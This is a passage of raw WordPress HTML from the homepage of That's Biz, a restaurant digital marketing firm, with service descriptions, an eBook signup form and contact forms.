menu-item-3878"><a href="https://website.thatsbiz.com/product-category/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-4068" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4068"><a href="https://website.thatsbiz.com/restaurant-email-marketing/">Email Marketing</a></li> <li id="menu-item-3012" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3012"><a href="https://website.thatsbiz.com/mobile-coupons/">Mobile Coupons</a></li> <li id="menu-item-3250" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3250"><a title="free guest wifi for restaurants" href="https://website.thatsbiz.com/guest-wifi-for-restaurants/">Guest WiFi</a></li> <li id="menu-item-3441" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3441"><a href="https://website.thatsbiz.com/text-marketing-2/">Text Message Mktg</a></li> <li id="menu-item-3580" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3580"><a href="https://website.thatsbiz.com/direct-mail-postcards/">Digital Postcards</a></li> <li id="menu-item-3622" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3622"><a href="https://website.thatsbiz.com/digital-flyers/">Digital Flyers</a></li> </ul> </li> <li id="menu-item-3879" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3879"><a href="https://website.thatsbiz.com/product-category/solutions-to-go/">Solutions-To-Go℠</a></li> <li id="menu-item-3109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3109"><a href="https://website.thatsbiz.com/facebook-advertising-2/">Facebook Ads</a> <ul class="sub-menu"> <li id="menu-item-3325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3325"><a href="https://website.thatsbiz.com/how-much-advertising-costs/">Ad Spend Calculator</a></li> </ul> </li> <li id="menu-item-4316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4316"><a href="https://website.thatsbiz.com/pizza-marketing/">Pizza Marketing</a></li> <li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-56"><a href="https://website.thatsbiz.com/company/">About</a> <ul class="sub-menu"> <li id="menu-item-3687" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3687"><a href="https://website.thatsbiz.com/contact-us/">Contact Us</a></li> </ul> </li> <li id="menu-item-1400" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1400"><a href="https://website.thatsbiz.com/blog/">Blog</a></li> </ul> </nav> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> <!-- #et-top-navigation --> </div> <!-- .container --> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="https://website.thatsbiz.com/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <!-- #main-header --> <div id="et-main-area"> <div id="main-content"> <article id="post-3901" class="post-3901 page type-page status-publish hentry"> <div class="entry-content"> <div class="at-above-post-homepage addthis_tool" data-url="https://website.thatsbiz.com/"></div><div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div class="et_pb_section et_pb_section_0 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_0"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1>Local Digital Marketing</h1> <h2>Services &amp; Solutions-To-Go!</h2> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_1"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">Digital Marketing Solutions for Restaurants</h1> <p style="text-align: center;">Welcome to That’s Biz where you can have all of your restaurant marketing needs addressed.</p> <p style="text-align: center;">We’re a team of digital marketing experts who help solve local marketing problems.</p> <p style="text-align: center;"><span style="color: #ff0000;">We work with and support Agencies, Independent Marketing Companies, Large Businesses and Brands, Corporate Marketing Departments, Franchisors, Franchisees, &amp; Independents.</span></p> <p style="text-align: center;">The digital solutions at That’s Biz get immediate results by building awareness, finding new customers, and increasing customer frequency.</p> <h2></h2> <h2 style="text-align: center;"><span style="color: #000000;">We have distributed over <span style="text-decoration: underline;">500 million</span> digital coupons!</span></h2> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_with_border et_pb_row et_pb_row_2"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_2 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;"><strong>Do You Want To Know All The <em>Secrets To Facebook Advertising</em> Specifically For Your Restaurant?</strong></h1> <h2 style="text-align: center;">Snatch our FREE 47-page eBook and let us guide you on how to utilize Facebook advertising to <em>constantly stay in front of your ideal customer.</em></h2> </div> </div> <!-- .et_pb_text --> <div id="et_pb_contact_form_0" class="et_pb_with_border et_pb_module et_pb_contact_form_0 et_pb_contact_form_container clearfix et_pb_text_align_center" data-form_unique_num="0" data-redirect_url="https://website.thatsbiz.com/here-is-your-e-book/"> <div class="et-pb-contact-message"></div> <div class="et_pb_contact"> <form class="et_pb_contact_form clearfix" method="post" action="https://website.thatsbiz.com/"> <p class="et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_half" data-id="firstname" data-type="input"> <label for="et_pb_contact_firstname_0" class="et_pb_contact_form_label">First Name</label> <input type="text" id="et_pb_contact_firstname_0" class="input" value="" name="et_pb_contact_firstname_0" data-required_mark="required" data-field_type="input" data-original_id="firstname" placeholder="First Name"> </p><p class="et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_half et_pb_contact_field_last" data-id="email_address" data-type="email"> <label for="et_pb_contact_email_address_0" class="et_pb_contact_form_label">Email Address</label> <input type="text" id="et_pb_contact_email_address_0" class="input" value="" name="et_pb_contact_email_address_0" data-required_mark="required" data-field_type="email" data-original_id="email_address" placeholder="Email Address"> </p> <input type="hidden" value="et_contact_proccess" name="et_pb_contactform_submit_0"> <input type="text" value="" name="et_pb_contactform_validate_0" class="et_pb_contactform_validate_field" /> <div class="et_contact_bottom_container"> <button type="submit" class="et_pb_contact_submit et_pb_button">Submit</button> </div> <input type="hidden" id="_wpnonce-et-pb-contact-form-submitted-0" name="_wpnonce-et-pb-contact-form-submitted-0" value="9073605ca7" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> </div> <!-- .et_pb_contact --> </div> <!-- .et_pb_contact_form_container --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_2 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_3"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_0 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/ThatsBiz_Chart-crisp-2.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/ThatsBiz_Chart-crisp-2.png" alt="" /></noscript></span> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_3 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1>That&#8217;s Biz Marketing Services</h1> <h2>Powerful AND Affordable!</h2> </div> </div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_4 et_pb_bg_layout_light et_pb_text_align_right"> <div class="et_pb_text_inner"> <p>Effective marketing requires systems and tools to capture contact information from your customers in-store or online.</p> <p>Email Marketing, Text Marketing, Loyalty, Guest WiFi, social media fans, and Facebook ads are all cost-effective means to reach out to current customers with promotions, rewards, and information.</p> <p>Very simply – the bigger your marketing lists and the more you know about the people on those lists – the better the results with your marketing systems.  Below briefly summarizes the marketing services we offer. For more details and our pricing check out our marketing services under the &#8220;Services&#8221; tab.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_4"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_video et_pb_video_0"> <div class="et_pb_video_box"> <iframe width="1080" height="608" src="about:blank" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen data-rocket-lazyload="fitvidscompatible" data-lazy-src="https://www.youtube.com/embed/ErD9NOFJwQA?feature=oembed"></iframe><noscript><iframe width="1080" height="608" src="https://www.youtube.com/embed/ErD9NOFJwQA?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></noscript> </div> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_3 et_section_regular"> <div class="et_pb_row et_pb_row_5"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_0 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/restaurant-email-marketing/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Email-Marketing.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Email-Marketing.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/restaurant-email-marketing/">Email Marketing</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_1 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/guest-wifi-for-restaurants/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/GuestWifi.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/GuestWifi.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/guest-wifi-for-restaurants/">Guest Wifi</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_2 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/text-marketing-2/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Text-Marketing.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Text-Marketing.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/text-marketing-2/">Text Marketing</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_3 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/text-marketing-2/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Loyalty-Marketing.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Loyalty-Marketing.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/text-marketing-2/">Loyalty Marketing</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_6"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_4 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/direct-mail-postcards/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalPostCards.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalPostCards.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/direct-mail-postcards/">Digital Post Cards</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_5 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/digital-flyers/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalFlyers.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalFlyers.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/digital-flyers/">Digital Flyers</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_15 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_6 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/mobile-coupons/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalCoupons.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/DigitalCoupons.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/mobile-coupons/">Digital Coupons</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_16 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_blurb et_pb_blurb_7 et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"> <div class="et_pb_blurb_content"> <div class="et_pb_main_blurb_image"><a href="https://website.thatsbiz.com/facebook-advertising-2/"><span class="et_pb_image_wrap"><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" class="et-waypoint et_pb_animation_top" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/FBAdvertising.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/FBAdvertising.png" alt="" class="et-waypoint et_pb_animation_top" /></noscript></span></a></div> <div class="et_pb_blurb_container"> <h4 class="et_pb_module_header"><a href="https://website.thatsbiz.com/facebook-advertising-2/">Facebook Advertising</a></h4> <div class="et_pb_blurb_description"> <p></p> </div><!-- .et_pb_blurb_description --> </div> </div> <!-- .et_pb_blurb_content --> </div> <!-- .et_pb_blurb --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_4 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_7"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_17 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_5 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>Local Digital Marketing Works!</h2> <p>Are your print marketing results getting worse over time? Local digital marketing executed properly will give you a strategic advantage over your competition.</p> <p>Your customers spend over five hours a day checking their smartphone hundreds of times a day. We’ll help you digitally target the right audience with the right message at the right time.</p> <p>Whether you&#8217;re an independent business owner or a franchisee of a chain &#8211; ALL business is local.  We&#8217;ll focus on solving your local business problems leveraging the digital lists and digital assets of you or your franchisor. Here’s what our customers have to say about That’s Biz digital marketing services.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_18 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_1 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Testimonials-V5.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/Testimonials-V5.png" alt="" /></noscript></span> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_5 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_8"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_19 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_6 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">Let&#8217;s Discuss Implementing Our Digital Marketing Services</h1> <p style="text-align: center;">Complete the form below to discuss how to implement affordable digital marketing services. Check out our low cost marketing services and pricing under the &#8220;Services&#8221; tab or give us a call at (<span>833) 429-1680</span> to speak with a human.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_6 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_9"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_20 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div id="et_pb_contact_form_0" class="et_pb_module et_pb_contact_form_1 et_pb_contact_form_container clearfix" data-form_unique_num="1"> <div class="et-pb-contact-message"></div> <div class="et_pb_contact"> <form class="et_pb_contact_form clearfix" method="post" action="https://website.thatsbiz.com/"> <p class="et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_half" data-id="firstname" data-type="input"> <label for="et_pb_contact_firstname_1" class="et_pb_contact_form_label">First Name</label> <input type="text" id="et_pb_contact_firstname_1" class="input" value="" name="et_pb_contact_firstname_1" data-required_mark="required" data-field_type="input" data-original_id="firstname" placeholder="First Name"> </p><p class="et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_half et_pb_contact_field_last" data-id="lastname" data-type="input"> <label for="et_pb_contact_lastname_1" class="et_pb_contact_form_label">Last Name</label> <input type="text" id="et_pb_contact_lastname_1" class="input" value="" name="et_pb_contact_lastname_1" data-required_mark="required" data-field_type="input" data-original_id="lastname" placeholder="Last Name"> </p><p class="et_pb_contact_field et_pb_contact_field_4 et_pb_text_align_left et_pb_contact_field_half" data-id="email_address" data-type="email"> <label for="et_pb_contact_email_address_1" class="et_pb_contact_form_label">Email Address</label> <input type="text" id="et_pb_contact_email_address_1" class="input" value="" name="et_pb_contact_email_address_1" data-required_mark="required" data-field_type="email" data-original_id="email_address" placeholder="Email Address"> </p><p class="et_pb_contact_field et_pb_contact_field_5 et_pb_text_align_left et_pb_contact_field_half et_pb_contact_field_last" data-id="phone" data-type="input"> <label for="et_pb_contact_phone_1" class="et_pb_contact_form_label">Phone #</label> <input type="text" id="et_pb_contact_phone_1" class="input" value="" name="et_pb_contact_phone_1" data-required_mark="required" data-field_type="input" data-original_id="phone" placeholder="Phone #" pattern="[0-9]*" title="Only numbers allowed."> </p> <input type="hidden" value="et_contact_proccess" name="et_pb_contactform_submit_1"> <input type="text" value="" name="et_pb_contactform_validate_1" class="et_pb_contactform_validate_field" /> <div class="et_contact_bottom_container"> <button type="submit" class="et_pb_contact_submit et_pb_button">Submit</button> </div> <input type="hidden" id="_wpnonce-et-pb-contact-form-submitted-1" name="_wpnonce-et-pb-contact-form-submitted-1" value="9073605ca7" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> </div> <!-- .et_pb_contact --> </div> <!-- .et_pb_contact_form_container --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_7 et_section_regular"> <div class="et_pb_row et_pb_row_10 et_pb_equal_columns"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_21 ds-vertical-align et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_7 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2><a href="https://website.thatsbiz.com/product-category/solutions-to-go/">What </a>are Solutions-To-Go?</h2> <p>Solutions-To-Go are affordable packaged digital advertising solutions designed to be implemented quickly for a set fee.</p> <p>Our digital marketing experts have implemented hundreds of advertising solutions solving business problems for businesses like yours.  We bring together a mix of writers, designers, and tech experts and customize the ad solutions for your business that will get you local results NOW.</p> <p>Visit our &#8220;Solutions-To-Go&#8221; tab and search for the problem you are trying to solve. You will see a description of how we solve the problem; results you can expect; and what is included in the solution. Very simply, pick the problem you want to solve, place your order, and we do the rest!</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_22 ds-vertical-align et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_2 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/ThatsBiz_Chart-crisp-2.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/ThatsBiz_Chart-crisp-2.png" alt="" /></noscript></span> </div> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_11"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_23 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_3 et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201%201'%3E%3C/svg%3E" alt="" data-lazy-src="https://website.thatsbiz.com/wp-content/uploads/2018/05/iconSection2.png" /><noscript><img src="https://website.thatsbiz.com/wp-content/uploads/2018/05/iconSection2.png" alt="" /></noscript></span> </div><div class="et_pb_module et_pb_text et_pb_text_8 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h3>Get New Customers &#8211; Increase Business &#8211; Save Time</h3> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_24 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_9 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>We deliver measurable results that matter</h2> <p>Pick the digital Solutions-To-Go that solve your immediate problems. We work with your platforms and your digital assets to implement done for you digital marketing solutions that will get the local results you need quickly.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_8 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_12"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_25 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_10 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">How We Implement Solutions-To-Go</h1> <p style="text-align: center;">We’ll introduce you to your very own account manager. They’ll be your point of contact, and assemble a team of savvy writers, designers, and techies, ready to implement the Solution-To-Go that solves your immediate business problem.</p> </div> </div> <!-- .et_pb_text --> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_13"> <div class="et_pb_column et_pb_column_1_4 et_pb_column_26 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_2 et_pb_column_27 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_video et_pb_video_1"> <div class="et_pb_video_box"> <iframe width="1080" height="608" src="about:blank" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen data-rocket-lazyload="fitvidscompatible" data-lazy-src="https://www.youtube.com/embed/JujSisaCYpU?feature=oembed"></iframe><noscript><iframe width="1080" height="608" src="https://www.youtube.com/embed/JujSisaCYpU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></noscript> </div> </div> </div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_4 et_pb_column_28 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"> </div> <!-- .et_pb_column --> </div> <!-- .et_pb_row --> </div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_9 et_pb_with_background et_section_regular"> <div class="et_pb_row et_pb_row_14"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_29 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_text et_pb_text_11 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h1 style="text-align: center;">Let&#8217;s Discuss Solving Your Business Problems</h1> <p style="text-align: center;">Complete the form below to discuss how to implement affordable local digital 